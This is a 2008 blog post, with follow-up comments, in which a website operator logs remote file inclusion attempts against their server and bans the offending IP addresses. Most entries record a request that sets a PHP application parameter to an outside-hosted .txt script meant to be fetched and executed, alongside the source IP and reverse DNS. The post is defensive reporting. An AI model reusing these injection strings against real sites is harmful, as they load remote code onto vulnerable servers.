Banning IP from spammers
February 17, 2008
We’ve started to get tough on spammers and the likes, anyone who requests something from our server they should not, will be banned by IP address.
We’ll also be recording the IP and RDNS in this post to hopefully gather some useful information that can be of help in the future.
Request: http://www.clickfind.com.au:80/main.php?other=http://www.fgwarez.com/bbs/skin/ting_music/…/usa??
Date Time: Feb 16, 2008 10:47 PM
Remote Address: 205.234.130.198
Reverse DNS: server.ingenieroweb.net
Request: http://www.clickfind.com.au:80/modules/coppermine/themes/default/theme.php?THEME_DIR=http://smolen.org/test.txt???
Date Time: Feb 16, 2008 9:49 PM
Remote Address: 209.126.142.130
Reverse DNS: dish4.net.ibizdns.com




February 17, 2008 at 11:29 pm
Request: http://www.clickfind.com.au:80/order.php?pag=http://www.cartographia.org/ftp/files/source/SinG??
Date Time: Feb 16, 2008 2:32 PM
Remote Address: 72.55.143.196
Reverse DNS: ip-72-55-143-196.static.privatedns.com
February 24, 2008 at 1:26 am
Request: http://www.clickfind.com.au:80/components/com_extcalendar/admin_events.php?CONFIG_EXTLANGUAGES_DIR=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt???
Date Time: Feb 23, 2008 7:33 PM
Remote Address: 61.14.187.140
Reverse DNS: Meteor.websiteactive.com
February 24, 2008 at 1:27 am
Request: http://www.clickfind.com.au:80/components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/durhaka/cmdasca.txt?????
Date Time: Feb 23, 2008 8:12 PM
Remote Address: 61.19.38.155
Reverse DNS: 61.19.38.155
February 24, 2008 at 1:27 am
Request: http://www.clickfind.com.au:80/pivot/modules/module_db.php?pivot_path=http://smolen.org/test.txt???
Date Time: Feb 23, 2008 4:44 PM
Remote Address: 85.25.144.182
Reverse DNS: golf529.server4you.de
February 28, 2008 at 1:49 am
Request; http://www.clickfind.com.au:80/administrator/admin/store/admin.php?component_dir=http://www.eshqs.com/error.txt???
Date Time: Feb 27, 2008 6:02 PM
Remote Address: 204.15.224.50
Reverse DNS: mail.wives-in-need.com
February 29, 2008 at 3:33 am
Request; http://www.clickfind.com.au:80/2007/cgi-bin/awstats.pl?output=notfounderror/modules/vwar/admin/admin.php?vwar_root=http://keesenmirjam.nl/media/mic22_mod.txt?
Date Time: Feb 28, 2008 9:41 PM
Remote Address: 72.232.118.237
Reverse DNS: 237.118.232.72.static.reverse.ltdomains.com
Request; http://www.clickfind.com.au:80/main.php?pageURL=http://www.citoyennete-active.org/mambots/content/test.txt???
Date Time: Feb 28, 2008 5:24 PM
Remote Address: 203.88.114.169
Reverse DNS: AT-HP7KQ1S.rtds.aussiehq.net.au
Request; http://www.clickfind.com.au:80/main.php?s=http://webmail.asl3.umbria.it/admin/inc/albania.txt?????????????????????????
Date Time: Feb 28, 2008 4:13 PM
Remote Address: 69.72.221.130
Reverse DNS: pyar.jaanhost.com
March 1, 2008 at 9:18 pm
Request: http://www.clickfind.com.au:80/gb/form.inc.php3?lang=http://smolen.org/test.txt???
Date Time: Feb 29, 2008 9:58 PM
Remote Address: 89.174.96.241
Reverse DNS: p23.progreso.pl
http://smolen.org/test.txt??? is a php file that they hope gets executed on the server.
Same as http://webmail.asl3.umbria.it/admin/inc/albania.txt?????????????????????????
We’ve emailed some of these websites telling them about the file on their server, and to proof its not them who uploaded the file. They can do this by providing the FTP or HTTP log file to us.
March 1, 2008 at 9:19 pm
echo “UNITED ALBANIANS aka ALBOSS PARADISE”; in one of the text files tells me that the hackers are from Albania.
March 3, 2008 at 2:51 am
Request: http://www.clickfind.com.au:80/board/index.php
Referer: http://www.clickfind.com.au/board/index.php
Date Time: Mar 2, 2008 11:16 PM
Remote Address: 211.52.153.134
Reverse DNS: d074.dhcp212-198-114.noos.fr
March 3, 2008 at 3:02 am
Request: http://www.clickfind.com.au:80/board/index.php
Referer: http://www.clickfind.com.au/board/index.php
Date Time: Mar 2, 2008 11:14 PM
Remote Address: 61.35.100.131
Request: http://www.clickfind.com.au:80/phpbb2/index.php
Referer: http://www.clickfind.com.au/phpbb2/index.php
Date Time: Mar 2, 2008 11:13 PM
Remote Address: 218.57.11.112
Reverse DNS: 218.57.11.112
Request: http://www.clickfind.com.au:80/2008/main.php?content=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt?
Date Time: Mar 2, 2008 11:37 AM
Remote Address: 61.47.60.169
Reverse DNS: dns1.internetthailand.net
Request: http://www.clickfind.com.au:80/2008/main.php?content=http://www.techbomb.com/fastmicrowave/coges.txt??
Date Time: Mar 2, 2008 11:26 AM
Remote Address: 217.197.68.66
Reverse DNS: ip-217-197-68-66.punkt.pl
Request: http://www.clickfind.com.au:80/2007/bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=http://216.191.16.12/.shell/site/iyes.txt??
Date Time: Mar 2, 2008 2:47 AM
Remote Address: 69.13.187.96
Reverse DNS: exceptionalhosting.propagation.net
Request: http://www.clickfind.com.au:80/administrator/admin/store/admin.php?component_dir=http://www.ar-vision.com/z.txt?????
Date Time: Mar 1, 2008 11:47 PM
Remote Address: 216.127.86.119
Reverse DNS: ev1s-216-127-86-119.ev1servers.net